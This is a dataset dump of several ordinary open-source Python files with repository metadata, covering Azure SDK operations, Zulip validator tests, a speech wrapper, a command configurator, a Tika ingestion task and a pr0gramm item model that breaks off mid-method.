text
stringlengths 4
1.02M
| meta
dict |
|---|---|
import time
def busy_sleep(seconds):
max_time = time.time() + int(seconds)
while time.time() < max_time:
pass
def swallow_exception():
try:
while True:
pass
except:
pass
|
{
"content_hash": "87107165c98879d2108843c06feaf83b",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 41,
"avg_line_length": 16.071428571428573,
"alnum_prop": 0.5466666666666666,
"repo_name": "Senseg/robotframework",
"id": "00291c26454d33bf67a59504497cae0061fc7a79",
"size": "225",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "atest/testdata/running/stopping_with_signal/Library.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "716"
},
{
"name": "Java",
"bytes": "48873"
},
{
"name": "JavaScript",
"bytes": "149654"
},
{
"name": "Python",
"bytes": "1637427"
},
{
"name": "Shell",
"bytes": "1323"
}
],
"symlink_target": ""
}
|
from msrest.serialization import Model
class Provider(Model):
"""Resource provider information.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: The provider ID.
:vartype id: str
:param namespace: The namespace of the resource provider.
:type namespace: str
:ivar registration_state: The registration state of the provider.
:vartype registration_state: str
:ivar resource_types: The collection of provider resource types.
:vartype resource_types: list of :class:`ProviderResourceType
<azure.mgmt.resource.resources.v2016_09_01.models.ProviderResourceType>`
"""
_validation = {
'id': {'readonly': True},
'registration_state': {'readonly': True},
'resource_types': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'registration_state': {'key': 'registrationState', 'type': 'str'},
'resource_types': {'key': 'resourceTypes', 'type': '[ProviderResourceType]'},
}
def __init__(self, namespace=None):
self.id = None
self.namespace = namespace
self.registration_state = None
self.resource_types = None
|
{
"content_hash": "e0ed87dc18068d763f0dee42a180e8b9",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 85,
"avg_line_length": 33.94736842105263,
"alnum_prop": 0.6364341085271318,
"repo_name": "v-iam/azure-sdk-for-python",
"id": "a6203659a6beb364d8dbb5fc6ee3125c81bac287",
"size": "1764",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-resource/azure/mgmt/resource/resources/v2016_09_01/models/provider.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19856874"
}
],
"symlink_target": ""
}
|
from typing import Any, AsyncIterable, Callable, Dict, Optional, TypeVar
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._code_containers_operations import build_create_or_update_request, build_delete_request, build_get_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class CodeContainersOperations:
"""CodeContainersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.machinelearningservices.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
resource_group_name: str,
workspace_name: str,
skip: Optional[str] = None,
**kwargs: Any
) -> AsyncIterable["_models.CodeContainerResourceArmPaginatedResult"]:
"""List containers.
List containers.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param workspace_name: Name of Azure Machine Learning workspace.
:type workspace_name: str
:param skip: Continuation token for pagination.
:type skip: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CodeContainerResourceArmPaginatedResult or the
result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.CodeContainerResourceArmPaginatedResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2022-10-01") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.CodeContainerResourceArmPaginatedResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
api_version=api_version,
skip=skip,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
api_version=api_version,
skip=skip,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("CodeContainerResourceArmPaginatedResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/codes"} # type: ignore
@distributed_trace_async
async def delete( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
workspace_name: str,
name: str,
**kwargs: Any
) -> None:
"""Delete container.
Delete container.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param workspace_name: Name of Azure Machine Learning workspace.
:type workspace_name: str
:param name: Container name. This is case-sensitive.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2022-10-01") # type: str
request = build_delete_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
name=name,
api_version=api_version,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/codes/{name}"} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
workspace_name: str,
name: str,
**kwargs: Any
) -> "_models.CodeContainer":
"""Get container.
Get container.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param workspace_name: Name of Azure Machine Learning workspace.
:type workspace_name: str
:param name: Container name. This is case-sensitive.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CodeContainer, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.CodeContainer
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CodeContainer"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2022-10-01") # type: str
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
name=name,
api_version=api_version,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('CodeContainer', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/codes/{name}"} # type: ignore
@distributed_trace_async
async def create_or_update(
self,
resource_group_name: str,
workspace_name: str,
name: str,
body: "_models.CodeContainer",
**kwargs: Any
) -> "_models.CodeContainer":
"""Create or update container.
Create or update container.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param workspace_name: Name of Azure Machine Learning workspace.
:type workspace_name: str
:param name: Container name. This is case-sensitive.
:type name: str
:param body: Container entity to create or update.
:type body: ~azure.mgmt.machinelearningservices.models.CodeContainer
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CodeContainer, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.CodeContainer
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CodeContainer"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2022-10-01") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(body, 'CodeContainer')
request = build_create_or_update_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
name=name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('CodeContainer', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('CodeContainer', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/codes/{name}"} # type: ignore
|
{
"content_hash": "495c774575655a019e0456fbc220e75b",
"timestamp": "",
"source": "github",
"line_count": 331,
"max_line_length": 209,
"avg_line_length": 42.41087613293051,
"alnum_prop": 0.6441088474141615,
"repo_name": "Azure/azure-sdk-for-python",
"id": "9936d55e256bf148d79fb6059c2fede07e8c4b54",
"size": "14538",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2022_10_01/aio/operations/_code_containers_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
import speech_recognition as sr
from gtts import gTTS
import pygame
class Speech:
"""
class for TTS and STT
"""
def __init__(self):
self.r = sr.Recognizer()
pygame.mixer.init()
def create_talk(self, str, fname, l='en'):
"""
function takes (text) and saves it to (file_name).mp3
parameters:
text - text
file_name - filename for output (without '.mp3')
[lang - language]
"""
tts = gTTS(text=str, lang=l)
tts.save(fname+".mp3")
def listen(self, time):
"""
function listens (time) sec and returns text or "fail"
parameters:
file_name - filename for output
time - recording time
"""
with sr.Microphone() as source:
self.r.adjust_for_ambient_noise(source)
audio = self.r.listen(source, 0, time)
try:
res = self.r.recognize_google(audio)
return res
except:
return "fail"
def play_talk(self, fname):
"""
function playes (file_name)
parameters:
file_name - mp3-file with speech (without '.mp3')
"""
pygame.mixer.music.load(fname+".mp3")
pygame.mixer.music.play()
|
{
"content_hash": "a09ec9b11f3d75ce5435b837cfa3fd86",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 63,
"avg_line_length": 22.440677966101696,
"alnum_prop": 0.513595166163142,
"repo_name": "HackRoboy/EmotionGame",
"id": "77ef4004cf3a035fc572f2a9aba9b5074bc65bb3",
"size": "1324",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "SpeechPython/speech.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "407"
},
{
"name": "C++",
"bytes": "21132"
},
{
"name": "Python",
"bytes": "4538"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
from zerver.decorator import \
REQ, has_request_variables, RequestVariableMissingError, \
RequestVariableConversionError, JsonableError
from zerver.lib.validator import (
check_string, check_dict, check_bool, check_int, check_list
)
import ujson
class DecoratorTestCase(TestCase):
def test_REQ_converter(self):
def my_converter(data):
lst = ujson.loads(data)
if not isinstance(lst, list):
raise ValueError('not a list')
if 13 in lst:
raise JsonableError('13 is an unlucky number!')
return lst
@has_request_variables
def get_total(request, numbers=REQ(converter=my_converter)):
return sum(numbers)
class Request(object):
REQUEST = {} # type: Dict[str, str]
request = Request()
with self.assertRaises(RequestVariableMissingError):
get_total(request)
request.REQUEST['numbers'] = 'bad_value'
with self.assertRaises(RequestVariableConversionError) as cm:
get_total(request)
self.assertEqual(str(cm.exception), "Bad value for 'numbers': bad_value")
request.REQUEST['numbers'] = ujson.dumps([2, 3, 5, 8, 13, 21])
with self.assertRaises(JsonableError) as cm:
get_total(request)
self.assertEqual(str(cm.exception), "13 is an unlucky number!")
request.REQUEST['numbers'] = ujson.dumps([1, 2, 3, 4, 5, 6])
result = get_total(request)
self.assertEqual(result, 21)
def test_REQ_validator(self):
@has_request_variables
def get_total(request, numbers=REQ(validator=check_list(check_int))):
return sum(numbers)
class Request(object):
REQUEST = {} # type: Dict[str, str]
request = Request()
with self.assertRaises(RequestVariableMissingError):
get_total(request)
request.REQUEST['numbers'] = 'bad_value'
with self.assertRaises(JsonableError) as cm:
get_total(request)
self.assertEqual(str(cm.exception), 'argument "numbers" is not valid json.')
request.REQUEST['numbers'] = ujson.dumps([1, 2, "what?", 4, 5, 6])
with self.assertRaises(JsonableError) as cm:
get_total(request)
self.assertEqual(str(cm.exception), 'numbers[2] is not an integer')
request.REQUEST['numbers'] = ujson.dumps([1, 2, 3, 4, 5, 6])
result = get_total(request)
self.assertEqual(result, 21)
class ValidatorTestCase(TestCase):
def test_check_string(self):
x = "hello"
self.assertEqual(check_string('x', x), None)
x = 4
self.assertEqual(check_string('x', x), 'x is not a string')
def test_check_bool(self):
x = True
self.assertEqual(check_bool('x', x), None)
x = 4
self.assertEqual(check_bool('x', x), 'x is not a boolean')
def test_check_int(self):
x = 5
self.assertEqual(check_int('x', x), None)
x = [{}]
self.assertEqual(check_int('x', x), 'x is not an integer')
def test_check_list(self):
x = 999
error = check_list(check_string)('x', x)
self.assertEqual(error, 'x is not a list')
x = ["hello", 5]
error = check_list(check_string)('x', x)
self.assertEqual(error, 'x[1] is not a string')
x = [["yo"], ["hello", "goodbye", 5]]
error = check_list(check_list(check_string))('x', x)
self.assertEqual(error, 'x[1][2] is not a string')
x = ["hello", "goodbye", "hello again"]
error = check_list(check_string, length=2)('x', x)
self.assertEqual(error, 'x should have exactly 2 items')
def test_check_dict(self):
keys = [
('names', check_list(check_string)),
('city', check_string),
]
x = {
'names': ['alice', 'bob'],
'city': 'Boston',
}
error = check_dict(keys)('x', x)
self.assertEqual(error, None)
x = 999
error = check_dict(keys)('x', x)
self.assertEqual(error, 'x is not a dict')
x = {}
error = check_dict(keys)('x', x)
self.assertEqual(error, 'names key is missing from x')
x = {
'names': ['alice', 'bob', {}]
}
error = check_dict(keys)('x', x)
self.assertEqual(error, 'x["names"][2] is not a string')
x = {
'names': ['alice', 'bob'],
'city': 5
}
error = check_dict(keys)('x', x)
self.assertEqual(error, 'x["city"] is not a string')
def test_encapsulation(self):
# There might be situations where we want deep
# validation, but the error message should be customized.
# This is an example.
def check_person(val):
error = check_dict([
['name', check_string],
['age', check_int],
])('_', val)
if error:
return 'This is not a valid person'
person = {'name': 'King Lear', 'age': 42}
self.assertEqual(check_person(person), None)
person = 'misconfigured data'
self.assertEqual(check_person(person), 'This is not a valid person')
|
{
"content_hash": "b9f6670405c97d29815bbf196a5f4c13",
"timestamp": "",
"source": "github",
"line_count": 167,
"max_line_length": 84,
"avg_line_length": 31.790419161676645,
"alnum_prop": 0.562817856470145,
"repo_name": "ryansnowboarder/zulip",
"id": "bc06ea374e5ec054f57fd79f4504c7b3961c4ae1",
"size": "5333",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "zerver/tests/test_decorators.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "164"
},
{
"name": "CSS",
"bytes": "182566"
},
{
"name": "CoffeeScript",
"bytes": "18435"
},
{
"name": "Groovy",
"bytes": "5515"
},
{
"name": "HTML",
"bytes": "385288"
},
{
"name": "JavaScript",
"bytes": "1571750"
},
{
"name": "Nginx",
"bytes": "1228"
},
{
"name": "PHP",
"bytes": "18930"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "383634"
},
{
"name": "Puppet",
"bytes": "95624"
},
{
"name": "Python",
"bytes": "1863879"
},
{
"name": "Ruby",
"bytes": "255867"
},
{
"name": "Shell",
"bytes": "32357"
}
],
"symlink_target": ""
}
|
import os # needed to start shell commands from python
import argparse # parsing commandline arguments
import sys
import config # import config.py file
import dataaccess # class which is responsible for manipulating the commands_file
import autoconfig #class which can determine some important things and create config file
class CommandLine:
def __init__(self, commands_file, action, parameters):
self.action = action
try:
self.data_access = dataaccess.DataAccess(commands_file)
except:
raise
self.parameters = parameters
self.command = parameters #parameters to find command
self.command.insert(0, config.system) #adding first parameter - system name
self.command = self.find_command() #finding command in commands_file
cases = {"find" : self.print_command,
"add" : self.add_command,
"delete" : self.del_command,
"run" : self.run_command,
}
cases[action]()
def find_command(self):
command = self.data_access.find(self.command)
for command_type, command_prefix in config.types.items():
if command_type.decode('utf-8') == command[0] and command_prefix:
command = command_prefix + " " + command[1]
break
else:
command = command[1]
break
if config.sudoEnable:
command = "sudo " + command
return command
def print_command(self):
print(self.command)
def add_command(self):
pass
def del_command(self):
pass
def run_command(self):
os.system(self.command)
if __name__ == "__main__":
if config.first_run:
print("\nFirst run, running autoconfig")
print("You will be able to change those settings in ./config.py file.")
ac = autoconfig.Autoconfig()
ac.replace_config_file()
config = reload(config)
parser = argparse.ArgumentParser(description = 'Comfortable configurator.')
parser.add_argument('--autoconfig', action = 'store_true', dest = 'autoconfig',
default = config.first_run,
help = 'Run autoconfig script. Other parameters are omitted.')
parser.add_argument('-c', '--commands-file', dest = 'commands_file',
default = config.commands_file,
help = 'Override the path of commands file')
parser.add_argument('-f', '--find',
nargs = argparse.REMAINDER,
help = 'Edit command that was found using remaining parameters')
parser.add_argument('-a', '--add',
nargs = argparse.REMAINDER,
help = 'Add command that is going to be found using remaining parameters')
parser.add_argument('-d', '--delete',
nargs = argparse.REMAINDER,
help = 'Delete command that was found using remaining parameters')
args, command = parser.parse_known_args()
action = ""
if len(sys.argv) == 1:
print(parser.format_help())
sys.exit(1)
if args.autoconfig:
ac = autoconfig.Autoconfig()
ac.ask_user()
ac.replace_config_file()
config = reload(config)
else:
if command:
args.command = command
action = "run"
else:
if args.find:
action = "find"
args.command = args.find
elif args.add:
action = "add"
args.command = args.add
elif args.delete:
action = "delete"
args.command = args.delete
try:
command_line = CommandLine(args.commands_file, action, args.command)
except IOError as e:
print("Comfi encountered problems with commands file: %s" % e.message)
except AttributeError as e:
print("Comfi encountered problems with parameters: %s" % e.message)
except BaseException as e:
print("Comfi stopped working because of: %s" % e.message)
|
{
"content_hash": "588e2378dd528a7c0b060ac384f60357",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 107,
"avg_line_length": 34.743801652892564,
"alnum_prop": 0.5685061845861085,
"repo_name": "czerwonyd/comfi",
"id": "47242fab8c68f2bdc789286daed087e37fc4e695",
"size": "4228",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "comfi.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9424"
}
],
"symlink_target": ""
}
|
import io
import urllib3
""" This module is pulled out from auto-generated swagger python client for flespi gateway"""
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""
Custom error messages for exception
"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""
Returns a dictionary of the response headers.
"""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""
Returns a given response header.
"""
return self.urllib3_response.getheader(name, default)
def get_messages_request(flespi_recv_obj, query_params):
headers = {}
headers['Authorization'] = flespi_recv_obj.auth_header
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
r = flespi_recv_obj.pool_manager.request('GET', flespi_recv_obj.target_url,
fields=query_params,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
r = RESTResponse(r)
r.data = r.data.decode('utf8')
if r.status != 200:
raise ApiException(http_resp=r)
return r
|
{
"content_hash": "7d8d61bbba932460e95ec8e89b9befd7",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 93,
"avg_line_length": 28.911392405063292,
"alnum_prop": 0.5621716287215411,
"repo_name": "janbartnitsky/flespi_receiver",
"id": "2a382bf6b4876e3c98881c6197423f25c2c9075f",
"size": "2284",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "flespi_receiver/swagger_api_reduced.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "460"
},
{
"name": "Python",
"bytes": "19943"
}
],
"symlink_target": ""
}
|
"""
Test script for ingesting PDFs from the file system using Tika
Some code directly ripped from Katrina's autonomy work
"""
import json
import re
import os
from celery import shared_task, task
TIKA_ENDPOINT="http://0.0.0.0:9998"
ELASTICSEARCH_HOST="http://0.0.0.0:9200"
from elasticsearch import Elasticsearch
from tika.tika import parse1 as parse
from django.db import IntegrityError
from task_manager.models import CeleryTask
def process_content(content_str, stopwords):
"""Produces a nicer content string by removing stop words and numbers.
Trying to also pull out keyword phrases for modeling in one pass."""
cleaned = []
features = {
"pure teleoperation" : 0,
"leader follower" : 0,
"obstacle detection" : 0,
"obstacle avoidance" : 0,
"route planning" : 0,
"mission planning" : 0,
"target recognition" : 0,
"autonomous mobility" : 0,
"feature identification" : 0,
"situational awareness" : 0,
"collaborative systems" : 0,
"adaptive behavior" : 0,
"tactical behavior" : 0,
}
last_token = ''
content_str = content_str.lower().split()
for token in content_str:
token = re.sub("[^a-zA-Z]", '', token)
if not(token in stopwords):
cleaned.append(token)
keyword_phrase = last_token + ' ' + token
if keyword_phrase in features.keys():
features[keyword_phrase] = 1
last_token = token
content_str = " ".join(cleaned)
return content_str, features
@shared_task(bind=True)
def create_index(self, index, *args, **kwargs):
self.index = index
# Check whether a CeleryTask already exists. If not, create the new object. If
# yes (IntegrityError), update the rows of the already existing object.
try:
self.index_task = CeleryTask(index=self.index, uuid=self.request.id)
self.index_task.save()
except IntegrityError:
self.index_task = CeleryTask.objects.get(index=self.index)
self.index_task.uuid = self.request.id
self.index_task.save()
es = Elasticsearch([ELASTICSEARCH_HOST])
files = [os.path.join(self.index.data_folder, x) for x in os.listdir(self.index.data_folder)]
if es.indices.exists(self.index.slug):
print("Deleting '%s' index" % self.index.slug)
res = es.indices.delete(index=self.index.slug)
print(" response: '%s'" % res)
stopwords = []
for f in files:
#Using experimental tika library - just a little janky
response = parse('all', f, TIKA_ENDPOINT)[1]
try:
if response[0] == '[':
#Sometimes response comes in brackets
parsed = json.loads(response[1:-1])
else:
#Sometimes not.
parsed = json.loads(response)
content, features = process_content(parsed["X-TIKA:content"], stopwords)
parsed["X-TIKA:cleaned"] = content
for kw, val in features.items():
parsed["has_" + re.sub(' ', '_', kw)] = val
#parsed["authors"] = process_authors(parsed["X-TIKA:content"])
es.index(index="%s" % self.index.index_name,
doc_type="autonomy",
body = parsed,
)
except Exception as e:
#Strange errors coming from new tika parser
#Just move on to the next document
print e
pass
|
{
"content_hash": "f93213b94d5c9cd4731f65f38e5bc3a5",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 97,
"avg_line_length": 33.79807692307692,
"alnum_prop": 0.5963015647226173,
"repo_name": "kod3r/memex-explorer",
"id": "b7f0decc47905db10546813bb1aec93ff3959ab7",
"size": "3515",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "source/task_manager/tika_tasks.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1416"
},
{
"name": "CSS",
"bytes": "48598"
},
{
"name": "HTML",
"bytes": "66219"
},
{
"name": "JavaScript",
"bytes": "39221"
},
{
"name": "Nginx",
"bytes": "1869"
},
{
"name": "Python",
"bytes": "127397"
},
{
"name": "SaltStack",
"bytes": "9226"
},
{
"name": "Shell",
"bytes": "7568"
}
],
"symlink_target": ""
}
|
from Tag import Tag
import time
from datetime import datetime
__author__ = "Peter Wolf"
__mail__ = "pwolf2310@gmail.com"
__date__ = "2016-12-25"
DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
class Item:
""" An item retrieved from pr0gramm.com """
def __init__(self, id):
self.id = id
self.tags = []
self.promoted = None
self.user = None
self.created = None
self.image = ""
self.width = -1
self.height = -1
self.thumb = ""
self.fullsize = None
self.source = None
self.audio = False
self.up = -1
self.down = -1
self.flags = 0
def __str__(self):
return "Item {0}, Promoted: {1}, Created: {3}, User: {2}".format(
self.id, self.promoted, self.user,
time.strftime(DATE_FORMAT, time.localtime(self.created)))
def __lt__(self, other):
return self.id < other.id
def __gt__(self, other):
return self.id > other.id
def __eq__(self, other):
return self.id == other.id
def __ne__(self, other):
return not self.__eq__(other)
def asDict(self):
d = self.__dict__
d["tags"] = [tag.__dict__ for tag in self.tags]
return d
def description(self):
return "Item {0}, Promoted: {1}, Created: {3}, User: {2}\n".format(
self.id, self.promoted, self.user,
time.strftime(DATE_FORMAT, time.localtime(self.created))) \
+ "Image: {0} ({1}x{2})\n".format(
self.image, self.width, self.height) \
+ "Thumb: {0}\n".format(self.thumb) \
+ "Full Size: {0}\n".format(self.fullsize) \
+ "Source: {0}\n".format(self.source) \
+ "Flags: {0}, {1} up, {2} down\n".format(
self.flags, self.up, self.down) \
+ "Tags: {}".format(", ".join([str(tag) for tag in self.tags]))
def isImage(self):
return self.image.endswith(".jpg") \
or self.image.endswith(".png")
def isVideo(self):
return self.image.endswith(".mp4") \
or self.image.endswith(".gif")
def getAge(self):
return datetime.now() - datetime.fromtimestamp(self.created)
def getSortId(self):
return self.promoted
def getMediaLink(self):
return self.image
def getThumbnailLink(self):
return self.thumb
def getFullsizeLink(self):
return self.fullsize
def setTagsFromJSON(self, json_tags):
self.tags = []
for json_tag in json_tags:
self.tags.append(
Tag(
json_tag["id"],
json_tag["confidence"],
json_tag["tag"]))
@staticmethod
def parseFromJSON(json_item):
parsed_item = Item(json_item["id"])
parsed_item.promoted = json_item["promoted"]
parsed_item.user = json_item["user"]
parsed_item.created = json_item["created"]
parsed_item.image = json_item["image"]
parsed_item.width = json_item["width"]
parsed_item.height = json_item["height"]
parsed_item.thumb = json_item["thumb"]
parsed_item.fullsize = json_item["fullsize"]
parsed_item.source = json_item["source"]
parsed_item.audio = json_item["audio"]
parsed_item.up = json_item["up"]
parsed_item.down = json_item["down"]
parsed_item.flags = json_item["flags"]
parsed_item.tags = []
if "tags" in json_item.keys():
for json_tag in json_item["tags"]:
tag = Tag(json_tag["id"],
json_tag["confidence"],
json_tag["tag"])
parsed_item.tags.append(tag)
return parsed_item
@staticmethod
def mockItem():
mock = Item(1679829)
mock.promoted = 204476
mock.user = "ExampleUser"
